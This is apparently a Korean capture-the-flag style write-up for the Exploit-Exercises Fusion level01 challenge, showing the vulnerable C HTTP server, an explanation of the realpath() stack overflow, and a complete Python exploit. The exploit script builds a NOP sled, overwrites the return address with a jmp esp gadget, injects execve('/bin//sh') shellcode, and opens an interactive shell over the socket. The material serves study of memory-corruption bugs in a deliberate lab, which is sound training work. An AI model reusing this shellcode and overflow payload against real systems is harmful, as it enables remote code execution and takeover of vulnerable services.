Fusion Level 1Exploit-Exercise 2016. 7. 12. 23:52
#include "../common/common.c"

/*
 * Canonicalise *path in place with realpath().
 *
 * This is the bug the level is built around: resolved[] is 128 bytes, but
 * realpath() is given no size and writes the canonical path (up to PATH_MAX)
 * into it unchecked.  A single path component longer than the buffer runs
 * past resolved[] and over this frame's saved registers and return address.
 * In glibc the component is copied into the buffer before it is stat()ed, so
 * the overwrite happens even though the call then fails and we `return 1`
 * (verify against the target's libc if the exploit below does not land).
 *
 * Note: declared int but has no return on the success path, so the value is
 * indeterminate there; the only caller ignores it anyway.
 */
int fix_path(char *path)
{
    char resolved[128];

    if(realpath(path, resolved) == NULL)
        return 1; // can't access path. will error trying to open

    strcpy(path, resolved);
}

/*
 * Read one request from fd 0 (presumably the accepted client socket after
 * set_io(fd) in main -- set_io() lives in common.c) and return the path part.
 *
 * One read() of at most sizeof(buffer) == 1024 bytes; the data is never
 * NUL-terminated here, so strchr()/strncmp() below trust the client's bytes.
 * The request must be "GET <path> HTTP/1.1": <path> runs to the first ' ',
 * and only the 8 bytes after that space are compared, so anything may follow
 * "HTTP/1.1".  <path> is then handed to fix_path(), where the overflow occurs.
 *
 * The returned pointer refers into buffer[], a local that is dead once this
 * function returns; main() discards the value.
 */
char *parse_http_request()
{
    char buffer[1024];
    char *path;
    char *q;

    // printf("[debug] buffer is at 0x%08x :-)\n", buffer); :D
    // (Left disabled: a client cannot learn where buffer[] lives, which is
    //  why the exploit below returns into a jmp esp gadget rather than a
    //  hard-coded stack address.)

    if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
    if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

    path = &buffer[4];
    q = strchr(path, ' ');
    if(! q) errx(0, "No protocol version specified");
    *q++ = 0; // terminate the path; q now points at the protocol string

    if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

    fix_path(path);

    printf("trying to access %s\n", path);

    return path;
}

/*
 * Entry point.  background_process(), serve_forever(), set_io() and the
 * NAME/UID/GID/PORT constants come from ../common/common.c; from their names
 * they presumably daemonise, drop privileges and accept one client per
 * process.  `p` is declared but never used.
 */
int main(int argc, char **argv, char **envp)
{
    int fd;
    char *p;

    background_process(NAME, UID, GID);
    fd = serve_forever(PORT);
    set_io(fd);

    parse_http_request();
}
코드는 간단하다.
read(0, buffer, sizeof(buffer))로 최대 1024바이트를 읽어 buffer에 넣고, "GET " 바로 뒤인 &buffer[4]를 path로 잡는다. path 뒤에는 공백이 있어야 하고(strchr로 그 자리를 잘라 NUL을 넣는다), 그 다음은 HTTP/1.1로 시작해야 한다(strncmp로 앞 8바이트만 비교). 취약점은 read()가 아니라 fix_path()에 있다: realpath()가 128바이트짜리 resolved 버퍼에 길이 검사 없이 경로를 써 넣으므로, 128바이트보다 긴 path 하나로 fix_path()의 리턴 주소까지 덮을 수 있다.
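"""Fusion level01 exploit (exploit-exercises.com).

The target's fix_path() calls realpath(path, resolved) with a 128-byte
resolved[] buffer and no length check, so a long path component overwrites
fix_path()'s saved return address.  The request built here points that return
address at a "jmp esp" gadget inside the binary, which lands in a NOP sled
followed by an execve("/bin//sh") shellcode on the (executable) stack.

Works on Python 2 and 3: every piece of the request is bytes, so it can be
concatenated with struct.pack() output on either interpreter.
"""
import socket
import struct

HOST = "10.211.55.15"
PORT = 20001

# execve("/bin//sh", ...) then exit(); 28 bytes.  Contains no NUL and no 0x20,
# which matters because the target cuts the path at the first space.
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
)
# Address of a "jmp esp" (ff e4) gadget in the level01 binary.  Used instead of a
# stack address because the binary no longer prints buffer's location (the debug
# printf in parse_http_request() is commented out).
JMP_ESP = 0x08049F4F
# Bytes from the start of fix_path()'s resolved[128] to its saved EIP, as found
# by the original write-up (128 bytes of buffer plus padding and saved EBP --
# re-derive with a debugger if the binary differs).
RET_OFFSET = 139
# NOP sled placed after the return address; jmp esp lands somewhere in here.
SLED = 100


def p(x):
    """Pack *x* as a 32-bit little-endian unsigned integer."""
    return struct.pack("<L", x)


def build_payload(jmp_esp=JMP_ESP, shellcode=SHELLCODE, ret_offset=RET_OFFSET, sled=SLED):
    """Return the raw request bytes that overflow fix_path() in the target.

    Layout: ``GET `` | ret_offset NOPs | jmp_esp | sled NOPs | shellcode | `` HTTP/1.1\\n``.
    Everything between "GET " and " HTTP/1.1" is the path the target passes to
    realpath(), so it must contain neither a space (strchr(path, ' ') would end
    the path early) nor a NUL.  The whole request must also fit in the target's
    single 1024-byte read().

    Args:
        jmp_esp: address written over the saved return address.
        shellcode: bytes executed once jmp esp lands in the sled.
        ret_offset: number of filler bytes before the return address.
        sled: number of NOPs between the return address and the shellcode.

    Returns:
        The request as bytes, newline-terminated like the original script.

    Raises:
        ValueError: if the path part contains ' ' or NUL, or the request is
            longer than 1024 bytes.
    """
    path = b"\x90" * ret_offset + p(jmp_esp) + b"\x90" * sled + shellcode
    if b" " in path or b"\x00" in path:
        raise ValueError("path part of the request must not contain ' ' or NUL")
    payload = b"GET " + path + b" HTTP/1.1\n"
    if len(payload) > 1024:
        raise ValueError("request exceeds the target's 1024-byte read buffer")
    return payload


def main():
    """Send the overflow request and hand the socket to an interactive session."""
    # telnetlib is deprecated (PEP 594) and removed in Python 3.13; importing it
    # here keeps build_payload() importable (and testable) on newer interpreters.
    import telnetlib

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    # sendall(): send() may return after a partial write, which would truncate
    # the request and break the offsets.
    s.sendall(build_payload())
    t = telnetlib.Telnet()
    t.sock = s  # reuse the already-connected socket for interact()
    t.interact()


if __name__ == "__main__":
    main()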
스택에 DEP(NX)가 걸려 있지 않아 스택 위의 NOP 슬레드와 쉘코드가 그대로 실행된다. 다만 buffer 주소를 찍어 주던 디버그용 printf가 주석 처리되어 있어 스택 주소를 직접 알 수 없으므로, 리턴 주소를 바이너리 안의 0xffe4(jmp esp) 가젯(0x08049F4F)으로 덮어 ret 직후 esp가 가리키는 NOP 슬레드로 점프하게 한다.